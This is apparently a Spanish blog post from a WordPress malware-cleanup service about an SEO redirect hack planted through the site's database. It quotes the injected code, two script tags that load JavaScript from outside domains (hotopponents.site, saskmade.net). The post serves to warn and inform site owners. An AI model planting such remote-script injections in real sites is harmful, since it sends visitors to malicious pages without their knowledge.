Redirecciones creadas en menús de Wordpress desde Mysql

Abusan Vulnerabilidad en una versión antigua del plugin Duplicator

octubre 1, 2018

Vulnerabilidad explotada de escala de privilegios en plugin WP GDPR Compliance

noviembre 9, 2018

octubre 25, 2018

Recientemente hemos recibido un caso muy habitual en los hackeos a WordPress, la creación de redirecciones (Hack Seo) creadas en esta ocasión alterando la base de datos. El código insertado entre los tag <a href.... </a> era los siguientes:

<script src='https://hotopponents.site/site.js?tight=2' type='text/javascript'></script><script src='https://saskmade.net/head.js?ver=2.0.0' type='text/javascript'></script>

Además el servicio de limpieza de malware vino inicialmente porque la página generaba un error 500, síntoma de que el WordPress había sido dañado. Efectivamente no nos equivocamos, se tuvo que realizar una reparación completa del Core de WordPress, plugins y base de datos.

En muchas ocasiones las modificaciones de código fuente en plugins o de lo propios archivos de WordPress, comprometen el funcionamiento del mismo.

Si tus clientes te avisan de que la web les envía a sitios distintos a tu página, páginas maliciosas o bien tu mismo notas un funcionamiento extraño en el sitio web, sin duda puede que hayan hackeado tu WordPress.

Redirecciones creadas en menús de WordPress desde Mysql

Abusan Vulnerabilidad en una versión antigua del plugin Duplicator

Vulnerabilidad explotada de escala de privilegios en plugin WP GDPR Compliance

Related posts

[SOLUCIONAMOS] Anuncio Google Ads rechazado por malware software malicioso

Redirecciones en WordPress: Vulnerabilidades en temas de tagDiv y plugins Ultimate Member

«The HoeflerText Font Wasn’t Found» Malware camuflado en alerta de fuente